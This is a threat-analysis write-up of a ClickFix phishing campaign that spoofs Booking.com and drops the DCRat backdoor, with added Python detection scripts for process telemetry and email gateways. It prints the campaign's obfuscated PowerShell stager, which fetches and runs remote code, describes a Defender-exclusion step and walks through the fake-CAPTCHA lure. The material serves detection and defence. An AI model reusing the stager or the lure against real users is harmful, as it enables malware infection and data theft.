
Booking.com? more like Booking.exe: inside a ClickFix email that drops malware

How attackers use clipboard PowerShell stagers and brand-spoofed links to bypass macros and drop a .NET RAT.

ClickFix keeps evolving, and the latest variant comes with a nasty prize: DCRat downloaded straight from a fake Booking.com help link. Sublime Security’s researchers caught the full chain, from the inbox lure to the final C2 beacons, and their write-up gives us a perfect lab sample to dissect. (sublime.security)

stage 0: the email that sells the lie

  • Fake thread for legitimacy – The attack kicks off with a doctored conversation about an apartment rental. A “colleague” allegedly fell ill mid-booking, so the sender (our attacker) needs the target to double-check an accommodation surcharge.

  • Brand misuse and look-alike domain – The message references Booking.com, but the hyperlink hides behind extrannet-ruless[.]com, a fresh domain that looks close enough to Booking’s Extranet portal to fool a quick glance.

  • Cloudflare warm-up – Clicking the link shows a legitimate Cloudflare Turnstile CAPTCHA first. That lowers suspicion and lets Cloudflare flag the page as “safe.” Right after you pass the real puzzle, a JavaScript-driven fake CAPTCHA loads in its place.

stage 1: clickfix does the clipboard hustle

When the user clicks “I’m not a robot” on the bogus CAPTCHA, JavaScript silently copies an obfuscated PowerShell command to the clipboard:

powERsheLl /nOPR'o' -W h -c "$url='getsyv[.]com';$sCrIpT=Invoke-RestMethod -Uri $url;Invoke-Expression $sCrIpT"

The page then shows two “verification steps”:

  1. Press Win + R

  2. Press Ctrl + V and hit Enter

Anyone following directions pastes the payload into the Run dialog, launching PowerShell with no further phishing or macro friction.

stage 2: loader script with a side of UAC

  • PowerShell reaches getsyv[.]com for a loader that continuously loops until it can run with admin rights.

  • The script adds Windows Defender exclusions for C:\Windows\Temp, ensuring future payloads stay off AV radar.

  • Next it pulls ckjg.exe from gettsveriff[.]com, saves it as tybd7.exe in Temp, and executes it.

A user-visible UAC prompt does appear, but the preceding “verification” narrative combined with fake Booking branding nudges many recipients to click Yes.
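The stage 1 stager and the stage 2 loader leave distinctive traces in process-creation telemetry: PowerShell spawned by explorer.exe (the Win + R path), a binary name in random case, quote splicing inside switches, a hidden window, a fetch piped into Invoke-Expression, and an Add-MpPreference exclusion. The following Python triage routine is an added example, not code from the post or from Sublime Security; it runs those checks over constructed Sysmon-style records (the first of which carries the exact command quoted above, still defanged) and shows why the case-sensitive regex from the detection tips would miss the real sample unless the command line is normalized first. The record layout, rule names and severity mapping are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records for this example; they are
# not telemetry from the campaign. Event 0 carries the stager quoted in stage 1
# (defanged "[.]" kept as in the post), event 1 mimics the loader's Defender
# exclusion, and event 2 is a benign scheduled script for contrast.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Windows\explorer.exe",   # Win+R launches come from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powERsheLl /nOPR'o' -W h -c \"$url='getsyv[.]com';"
                       "$sCrIpT=Invoke-RestMethod -Uri $url;Invoke-Expression $sCrIpT\"",
    },
    {
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -c "Add-MpPreference -ExclusionPath C:\Windows\Temp"',
    },
    {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\rotate-logs.ps1",
    },
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Casings a human or a scheduler would plausibly type; anything else is suspect.
NORMAL_CASINGS = {"powershell", "powershell.exe", "POWERSHELL", "POWERSHELL.EXE",
                  "PowerShell", "PowerShell.exe", "Powershell", "Powershell.exe"}


def normalize(cmdline: str) -> str:
    """Undo the stager's cheap tricks: quote splicing (/nOPR'o'), backtick
    escapes and random case, so one lowercase regex sees the real command."""
    return re.sub(r"['\"`]", "", cmdline).lower()


def basename(path: str) -> str:
    return PureWindowsPath(path.strip('"')).name


def analyze(event: dict) -> list[str]:
    """Return the names of every rule the event trips; [] means no finding."""
    findings = []
    raw = event["CommandLine"]
    norm = normalize(raw)

    # Run-dialog launch: explorer.exe spawning PowerShell is exactly the
    # Win+R / Ctrl+V path the lure tells the victim to follow.
    if (basename(event["Image"]).lower() in POWERSHELL_IMAGES
            and basename(event["ParentImage"]).lower() == "explorer.exe"):
        findings.append("run_dialog_launch")

    # Mixed-case binary name (powERsheLl) defeats case-sensitive string matches
    # but is itself a strong signal.
    first = basename(raw.split()[0])
    if first.lower() in POWERSHELL_IMAGES | {"powershell", "pwsh"} and first not in NORMAL_CASINGS:
        findings.append("case_obfuscation")

    # Download cradle: a fetch (Invoke-RestMethod and friends) fed into IEX.
    if (re.search(r"invoke-restmethod|invoke-webrequest|downloadstring|net\.webclient", norm)
            and re.search(r"invoke-expression|\biex\b", norm)):
        findings.append("download_cradle")

    # Hidden window (-W h / -WindowStyle Hidden): nothing for the victim to notice.
    if re.search(r"[-/]w(indowstyle)?\s+h(idden)?\b", norm):
        findings.append("hidden_window")

    # Defender exclusion being added before the payload lands (stage 2).
    if re.search(r"add-mppreference.*-exclusion(path|process|extension)", norm):
        findings.append("defender_exclusion")

    return findings


def severity(findings: list[str]) -> str:
    """Map findings to an action level: high = block, medium = alert, none."""
    if "download_cradle" in findings or "defender_exclusion" in findings:
        return "high"
    return "medium" if findings else "none"


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        hits = analyze(ev)
        print(f"event {i}: {severity(hits):6} {hits}")
```

One caveat for the exclusion rule: when the loader calls Add-MpPreference inside an already-running script, no new process is created and there is no fresh command line to inspect, so pair this with Defender's own configuration-change event (Event ID 5007 in the Windows Defender operational log) or PowerShell script block logging (Event ID 4104), both of which record the cmdlet regardless of how it was invoked.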

stage 3: dcrat — old RAT, new wrapper

ckjg.exe is DCRat (DarkCrystal), a .NET backdoor dating to 2019 that’s still popular thanks to its cheap one-time license and thriving plugin market. Out-of-the-box it offers:

  • command-execution and keylogging

  • cookie, password and clipboard theft

  • filesystem exfiltration and screenshot capture

The sample’s configuration points to five *.click C2 domains, each registered within days of the campaign. SHA-256 for the binary:

08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198

why clickfix keeps working

  1. No macro barriers – Modern Office blocks VBA by default; ClickFix sidesteps email attachment scanning entirely by leaning on the user’s clipboard.

  2. Legit brand flow – Real CAPTCHA → fake CAPTCHA → Run prompt creates a believable, fast rhythm.

  3. Defender blind spot – Local AV exclusions are added before the malware lands, guaranteeing a clean runway.

detection & defense tips

Checks that stop this attack, by layer:

  • Email gateway – Flag newly registered domains (<10 days old), fake threads, and Booking.com brand mentions with mismatching URLs.

  • Endpoint – Alert when clipboard content matches a suspicious regex like powershell.*Invoke-RestMethod; block Defender exclusion commands from non-admin contexts.

  • Network – Sinkhole getsyv[.]com, gettsveriff[.]com, and the *.click C2s; monitor for PowerShell user agents in outbound HTTP.

  • User training – “Win + R, Ctrl + V” should raise alarms. Teach staff that real CAPTCHAs never ask them to paste commands into the Run box.
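The email-gateway row above describes three checks that can be scripted together: a forged "RE:" thread with no threading headers, a brand named in the body while the hyperlink leaves that brand's domains, and a link domain registered only days ago. The Python scanner below is an added example, not code from the post or from Sublime Security. It parses a constructed lure modelled on the stage 0 description (the look-alike domain stays defanged as in the post and is refanged for parsing), plus a constructed benign reply as a control. The brand allow-list, the dates and the registration lookup table are this example's assumptions; in production the lookup would be a WHOIS/RDAP query.

```python
import re
from datetime import date
from html.parser import HTMLParser
from urllib.parse import urlsplit

NEW_DOMAIN_DAYS = 10   # the post's "<10 days old" threshold

# Brand -> domains that may legitimately carry its links. Minimal, constructed
# allow-list for the example; a real gateway would load a maintained one.
BRAND_DOMAINS = {"booking.com": {"booking.com"}}

# Stand-in for a WHOIS/RDAP lookup so the example runs offline: the lure domain
# named in the post with a constructed registration date four days before TODAY.
TODAY = date(2025, 1, 15)
REGISTERED_ON = {"extrannet-ruless.com": date(2025, 1, 11)}

# Constructed lure modelled on the stage 0 description (not the real email).
# The link is kept defanged as in the post; refang() restores it for parsing.
SUSPICIOUS_HEADERS = {"Subject": "RE: apartment reservation - surcharge check"}
SUSPICIOUS_HTML = """
<p>Hi, my colleague fell ill in the middle of the booking. Could you double-check
the accommodation surcharge on Booking.com before the guest arrives?</p>
<p><a href="https://extrannet-ruless[.]com/extranet/verify">Open the Booking.com Extranet</a></p>
"""

# Constructed benign control: a genuine reply (threading header present) whose
# link really goes to the brand's own domain.
BENIGN_HEADERS = {"Subject": "Re: your reservation", "In-Reply-To": "<msg@example.com>"}
BENIGN_HTML = '<p>Your Booking.com reservation: <a href="https://www.booking.com/">view</a></p>'


class LinkExtractor(HTMLParser):
    """Collect (href, anchor text) pairs plus the visible text of an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self.text, self._open = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._open = [dict(attrs).get("href", ""), ""]
            self.links.append(self._open)

    def handle_endtag(self, tag):
        if tag == "a":
            self._open = None

    def handle_data(self, data):
        self.text.append(data)
        if self._open is not None:
            self._open[1] += data


def refang(url: str) -> str:
    return url.replace("[.]", ".").replace("hxxp", "http")


def under_brand(host: str, brand: str) -> bool:
    """True when host is one of the brand's domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS[brand])


def scan_email(headers, html, today=TODAY, registered_on=REGISTERED_ON):
    """Return a list of (rule, detail) findings; an empty list means clean."""
    parser = LinkExtractor()
    parser.feed(html)
    body = " ".join(parser.text).lower()
    findings = []

    # Fake thread: a "RE:" subject with no In-Reply-To/References header was
    # never a reply to anything this mailbox sent.
    subject = headers.get("Subject", "")
    if re.match(r"\s*(re|fwd?|aw|wg)\s*:", subject, re.I) and not (
            headers.get("In-Reply-To") or headers.get("References")):
        findings.append(("forged_thread", subject))

    mentioned = [b for b in BRAND_DOMAINS if b in body]
    for href, _text in parser.links:
        host = (urlsplit(refang(href)).hostname or "").lower()
        if not host:
            continue
        # Brand named in the body, but the link leaves the brand's domains.
        for brand in mentioned:
            if not under_brand(host, brand):
                findings.append(("brand_link_mismatch", f"{brand} mentioned, link goes to {host}"))
        # Look-alike domains are typically registered days before use.
        registered = registered_on.get(host)
        if registered is not None and (today - registered).days < NEW_DOMAIN_DAYS:
            findings.append(("newly_registered_domain", f"{host} is {(today - registered).days} days old"))
    return findings


if __name__ == "__main__":
    print(scan_email(SUSPICIOUS_HEADERS, SUSPICIOUS_HTML))
    print(scan_email(BENIGN_HEADERS, BENIGN_HTML))
```

The three rules are deliberately independent so that a lure which drops one of them (say, a domain aged past the threshold) still trips the other two; a gateway would score the combination rather than block on any single hit.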

ClickFix is a master class in turning human impatience into code execution. This variant shows how little infrastructure an attacker needs: two throwaway domains, a PowerShell stager, and an off-the-shelf RAT. Control the clipboard, watch for odd Run-dialog launches, and keep users skeptical of any CAPTCHA that wants keyboard shortcuts.